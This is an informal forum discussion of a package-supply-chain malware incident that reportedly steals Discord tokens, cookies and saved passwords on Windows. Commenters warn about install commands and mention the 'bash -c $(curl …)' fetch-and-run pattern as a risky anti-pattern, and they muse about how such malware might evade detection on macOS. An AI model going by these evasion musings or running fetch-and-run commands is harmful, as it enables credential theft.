Woa, that hurts. Seems it is targeting Windows installations, is it not?
Modern web development is absolute bonkers. Just slurp code straight off the internet, what could go wrong? Reminds me of this xkcd: xkcd: Dependency
I’m not sure about the Windows angle. Another post somewhere said that this malware “exfiltrates your Discord tokens, cookies and saved passwords.”
I don’t see any reason that this type of attack couldn’t be carried out with any language (at least those that I am familiar with) and on any platform.
It seems that the malicious payload at some stage runs “pythonw.exe”, which I suspect would fail on macOS. But this is only because the creators targeted Windows installations instead of Unix-based ones. I haven’t really followed the attack description but in macOS it would probably trigger some security dialog due to lack of Full Disk Access permission or something like that so it would be quickly detected.
There is a lesson to be learned, of course, and a dedicated attacker could probably target macOS victims with more subtle techniques. All those “gem install”, “npm install”, “pip install” or, worse, the anti pattern “bash -c $(curl … )” are not innocent commands. I shudder only thinking what would happen if the popular Homebrew was compromised!
I’ve only skimmed the article over the first sips of morning coffee, but I don’t think it would take much for the exploit to detect it’s running on a Mac and simply use the normal python executable? I don’t think that running a python script on a Mac automatically opens a window. Also, if this is only going after things that are in your home directory it may not trigger any warnings at all.